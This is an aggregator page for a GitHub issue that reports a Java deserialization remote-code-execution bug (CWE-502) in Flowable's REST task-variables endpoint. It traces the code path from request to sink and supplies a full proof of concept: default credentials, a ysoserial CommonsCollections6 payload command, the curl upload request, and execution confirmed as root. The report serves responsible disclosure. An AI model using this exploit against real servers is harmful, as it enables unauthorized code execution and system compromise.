Hacktoberfest 2026:维护者为十月标记出来的 issue,仍然开放、适合新手。 浏览 Hacktoberfest issue

[SECURITY] Deserialization RCE via TaskVariableCollectionResource multipart endpoint with type=serializable (CWE-502, CVSS 8.8)

未关闭
#4,291 0 条评论 0 个 reaction 已指派 0 人 在 GitHub 查看

还没有人认领这个 Issue。

评估

难度
5/5
预计耗时
一周以上
新手友好度
30/100
Issue 类型
缺陷
描述清晰度
基本清楚
活跃度
活跃
技术栈
java
领域
api, backend, security

调研方向

Read TaskVariableCollectionResource.java:124-130 and TaskVariableBaseResource.java:123-187, then trace the multipart request through type validation to ObjectInputStream.readObject(). Use the reported multipart request only in an isolated test environment and inspect how serializable variables are configured. Done means the endpoint safely handles the reported input without unrestricted deserialization, with regression coverage for the affected path.

由索引模型根据 Issue 内容生成。

描述

Security Vulnerability Report -- CWE-502

Summary

The TaskVariableCollectionResource's multipart/form-data endpoint directly deserializes user-uploaded file content via ObjectInputStream.readObject() without any class whitelist filtering, allowing an authenticated user to achieve remote code execution (RCE) by crafting malicious serialized objects.

Vulnerability Description

Affected Repository: https://github.com/flowable/flowable-engine
Branch: main
Commit: 74fdb349c134e96e1f10592020ccca6e2e4b85f0


Static Analysis Report

Vulnerability Overview

The POST /runtime/tasks/{taskId}/variables endpoint supports uploading binary/serializable variables via multipart/form-data. When the request parameter type=serializable, the server directly uses java.io.ObjectInputStream.readObject() to deserialize the uploaded file, without applying any class whitelist/blacklist filtering. Under the default configuration rest.variables.allow.serializable=true, an authenticated attacker can upload malicious serialized payloads (such as CommonsCollections gadget chains) to achieve remote code execution.

Exploitation Prerequisites
Condition Description
Authentication Requires HTTP Basic authentication, and user must have rest-api privilege (default flowable.rest.app.authentication-mode=verify-privilege)
Network Reachability Intranet/public network (depending on deployment)
Input Constraints Need to know a valid taskId
Business Prerequisites None
Configuration Dependency rest.variables.allow.serializable=true (default configuration, see flowable-default.properties:57)
Trigger Location

TaskVariableBaseResource.java:182-186

} else if (isSerializableVariableAllowed) {
    // Try deserializing the object
    ObjectInputStream stream = new ObjectInputStream(file.getInputStream());
    Object value = stream.readObject();  // <--- unsafe deserialization
    setVariable(task, variableName, value, scope, isNew);
    stream.close();
Data Flow Overview
HTTP POST /runtime/tasks/{taskId}/variables (multipart/form-data)
  params: name=testVar, type=serializable, [email protected]
  ↓
TaskVariableCollectionResource.createTaskVariable (TaskVariableCollectionResource.java:124)
  ↓
request instanceof MultipartHttpServletRequest → true
  ↓
setBinaryVariable(request, task, true) (TaskVariableBaseResource.java:123)
  ↓
variableType = request.getParameterMap()["type"][0] → "serializable"
  ↓
file = request.getFile(first key) → MultipartFile
  ↓
ObjectInputStream(file.getInputStream()).readObject() (TaskVariableBaseResource.java:184-185) [SINK]
Data Flow Detailed Code Analysis

Layer 1: Entry Controller

  • file: TaskVariableCollectionResource.java:124-130
  • External input: taskId (PathVariable), request (HttpServletRequest)
  • Operation: Gets Task object, checks if request is multipart
  • Passed to next layer: setBinaryVariable((MultipartHttpServletRequest) request, task, true)

Layer 2: Task Retrieval (no access control)

  • file: TaskBaseResource.java:595-601
  • Operation: taskService.createTaskQuery().taskId(taskId).singleResult() — no permission check

Layer 3: setBinaryVariable — parameter extraction

  • file: TaskVariableBaseResource.java:123-156
  • Operation: Extracts name, type, scope parameters from multipart form, gets first uploaded file

Layer 4: Type validation

  • file: TaskVariableBaseResource.java:164-167
  • Operation: Validates variableType must be binary or serializable, no security filtering

Layer 5: Deserialization Sink

  • file: TaskVariableBaseResource.java:182-187
  • External input: file.getInputStream() — user-uploaded file raw byte stream
  • Operation: new ObjectInputStream(file.getInputStream()).readObject() — direct deserialization, no class filtering
CVSS Breakdown

CVSS v3.1 Score: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = 8.8

Vector Value Reason
AV (Attack Vector) N (Network) REST API accessible via network
AC (Attack Complexity) L (Low) Only needs to construct multipart request and upload serialized payload
PR (Privileges Required) L (Low) Requires authenticated user with rest-api privilege
UI (User Interaction) N (None) No user interaction required
S (Scope) U (Unchanged) Impact limited to Flowable application itself
C (Confidentiality) H (High) RCE can fully read application data and config
I (Integrity) H (High) RCE can modify arbitrary data, deploy malicious process definitions
A (Availability) H (High) RCE can cause complete service unavailability

PoC Verification Report

Flowable REST TaskVariable ObjectInputStream Deserialization RCE

Vulnerability Summary

  1. Vulnerability Name: TaskVariableCollectionResource multipart/form-data unsafe deserialization RCE
  2. Affected Component/Port: Flowable REST API (flowable-rest-7.1.0.war), port 8080
  3. Vulnerability Description: The POST /runtime/tasks/{taskId}/variables endpoint directly uses ObjectInputStream.readObject() to deserialize uploaded file content when receiving multipart/form-data requests with type=serializable, without any class whitelist filtering. An authenticated attacker can upload malicious serialized objects generated by tools like ysoserial to achieve remote code execution.
  4. Root Cause Code Snippet:
// TaskVariableBaseResource.java:182-187
} else if (isSerializableVariableAllowed) {
    ObjectInputStream stream = new ObjectInputStream(file.getInputStream());
    Object value = stream.readObject();  // no class whitelist filtering
    setVariable(task, variableName, value, scope, isNew);
    stream.close();
}
  1. Brief Data Flow:
HTTP POST multipart/form-data (type=serializable, [email protected])
  ↓
TaskVariableCollectionResource.createTaskVariable (TaskVariableCollectionResource.java:124)
  ↓
setBinaryVariable(request, task, true) (TaskVariableBaseResource.java:123)
  ↓
type validation: "serializable" passes (TaskVariableBaseResource.java:164-167)
  ↓
new ObjectInputStream(file.getInputStream()).readObject() (TaskVariableBaseResource.java:185) [SINK]
  ↓
gadget chain triggers → Runtime.exec() → RCE

Exploitation Conditions

Condition Description
Authentication Requires HTTP Basic Auth (any valid user, default rest-admin:test)
Network Reachability Intranet/public network (REST API port 8080 reachable)
Configuration Dependency Exploitable with default config (rest.variables.allow.serializable=true)
Other Prerequisites Need a valid taskId (can be enumerated via /runtime/tasks endpoint)

Exploitation Chain Progress

Chain Stage Location (file:line) Status Evidence / Description
Entry TaskVariableCollectionResource.java:124 Reachable POST multipart request successfully entered createTaskVariable
Parameter extraction TaskVariableBaseResource.java:142-156 Reached name=testVar, type=serializable extracted from multipart form
Type validation TaskVariableBaseResource.java:164-167 Passed type="serializable" passes binary/serializable validation
Sink TaskVariableBaseResource.java:184-185 Triggered ObjectInputStream.readObject() deserialization executed, CC6 gadget chain triggered Runtime.exec()
Conclusion — Full Chain Closed RCE successful, server created files /tmp/poc_entry_0658 and /tmp/poc_entry_0658_h2

Exploitation Verification

Step 1: Obtain valid taskId

curl -s -u rest-admin:test 'http://localhost:8080/flowable-rest/service/runtime/tasks?size=1' | python3 -c "import sys,json; print(json.load(sys.stdin)['data'][0]['id'])"

Actual execution result: returned taskId d89ce83e-8fff-11f1-a444-02423661ba3a (can also use existing tasks).

Step 2: Generate ysoserial CommonsCollections6 payload

Flowable WAR's classpath contains commons-collections-3.2.2.jar, CC6 gadget chain can be used. Server runs JDK 17, need to add --add-opens parameters to generate payload:

java --add-opens java.base/java.util=ALL-UNNAMED \
     --add-opens java.base/java.lang=ALL-UNNAMED \
     --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
     -jar ysoserial-all.jar CommonsCollections6 'touch /tmp/poc_entry_0658' > payload.ser

Actual execution result: Generated 1298-byte serialized payload file payload.ser.

Step 3: Send malicious multipart request to trigger deserialization (end-to-end attack command)

curl -s -u rest-admin:test \
  -X POST \
  -H "Content-Type: multipart/form-data" \
  -F "name=testVar" \
  -F "type=serializable" \
  -F "[email protected]" \
  "http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables"

Actual execution result:

  • HTTP response code: 201 Created
  • Response body:
{"name":"testVar","type":"serializable","value":null,"valueUrl":"http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables/testVar/data","scope":"local"}
  • Server filesystem verification: ls -la /tmp/poc_entry_0658 shows file was created:
-rw-r----- 1 root root 0 Aug  4 12:28 /tmp/poc_entry_0658

Step 4: Repeatability verification

Using the same method to generate a second payload touch /tmp/poc_entry_0658_h2, after sending the request also received HTTP 201 and file was successfully created:

java --add-opens java.base/java.util=ALL-UNNAMED \
     --add-opens java.base/java.lang=ALL-UNNAMED \
     --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
     -jar ysoserial-all.jar CommonsCollections6 'touch /tmp/poc_entry_0658_h2' > payload_h2.ser

curl -s -u rest-admin:test \
  -X POST \
  -F "name=testVar2" -F "type=serializable" \
  -F "file=@payload_h2.ser" \
  "http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables"

Result: HTTP 201, /tmp/poc_entry_0658_h2 file successfully created. Third repeat test /tmp/poc_entry_0658_h3 also succeeded.

Conclusion: An authenticated attacker can upload a ysoserial CommonsCollections6 gadget chain payload through the POST /runtime/tasks/{taskId}/variables endpoint, triggering ObjectInputStream.readObject() deserialization, executing arbitrary OS commands on the Flowable server with Tomcat process privileges (root). This vulnerability is exploitable under default configuration without any additional configuration changes. Three independent tests all successfully created server-side files, RCE fully confirmed.

Severity

CVSS v3.1: 8.8 (High)

Vulnerability Category: CWE-502

CVE Assignment Request

If this vulnerability is confirmed as genuine, we would be grateful if you could request a CVE ID from GitHub for this security advisory.

Even if this vulnerability no longer affects the latest version, we kindly ask whether a CVE could still be assigned for the historically affected versions, as this would assist users and organizations in identifying and remediating the issue in legacy deployments.

Thank you for your help.

主要语言
Java
星标
9.6k
派生
2.9k
平均合并
1 小时 9 分钟
30 天内合并 PR
2

环境准备

  • 没有 Dockerfile 或 Docker Compose 文件
  • 有 Pull Request 模板
  • 没有贡献指南

从这里开始

  1. 先读完整个 Issue,再读项目的贡献指南。
  2. 在 Issue 下留言说明你要接手 —— 这能避免两个人做同样的事。
  3. Fork 仓库,在一个分支上完成修改。
  4. 提交 Pull Request,并在描述里引用这个 Issue 编号。

flowable/flowable-engine 的其他 Issue

查看 flowable/flowable-engine 的全部 Issue

相似的 Issue

更多 Java Issue

把新 issue 发到你的邮箱

精选适合新手参与的 GitHub issue 摘要。